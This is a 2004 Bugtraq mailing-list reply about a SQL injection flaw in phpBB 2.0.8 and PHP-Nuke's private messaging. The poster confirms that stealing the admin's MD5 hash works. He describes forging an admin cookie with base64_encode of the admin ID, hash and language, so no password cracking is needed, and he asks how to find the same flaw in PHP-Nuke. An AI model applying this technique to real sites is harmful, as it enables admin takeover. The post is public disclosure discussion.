Date: Tue, 06 Apr 2004 20:44:35 -0700
From: "T.J. Ferraro" <tjtoocool@...eaker.net>
To: bugtraq@...urityfocus.com
Cc: come2waraxe@...oo.com, shaunige@...oo.co.uk
Subject: Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8
    and in older versions]

The combination of the original post with the couple of follow ups that
followed were quite effective. Putting the hash in the message instead
of subject worked to show the whole hash. And I can't recall if it was
discussed on this thread or not but creating the admin =
base64_encode($aid:$md5hash:$lang) worked to further successfully push
the severity considering that if the admin's password were greater than
9 or 10 characters (assuming no dictionary words and using special
chars) cracking the stolen md5 hash would not be mathematically
feasible. So suffice it to say, this works very well. I noticed a patch
was posted for phpBB (the patch as far as I could tell just changed a '
.= ' into a ' = ' correct?). However, this problem also worked on just
the basic phpnuke. I looked around for privmsg.php within phpnuke, but
none exists. I assume there is another file within nuke's modules where
the '$pm_sql_user .=' exists. Already checked all the php files in the
modules directory of Private_Messages (going off of a 6.0 distro), but
good ol' kwrite didn't find anything when I searched the files for
'$pm'. Any ideas? Thanks.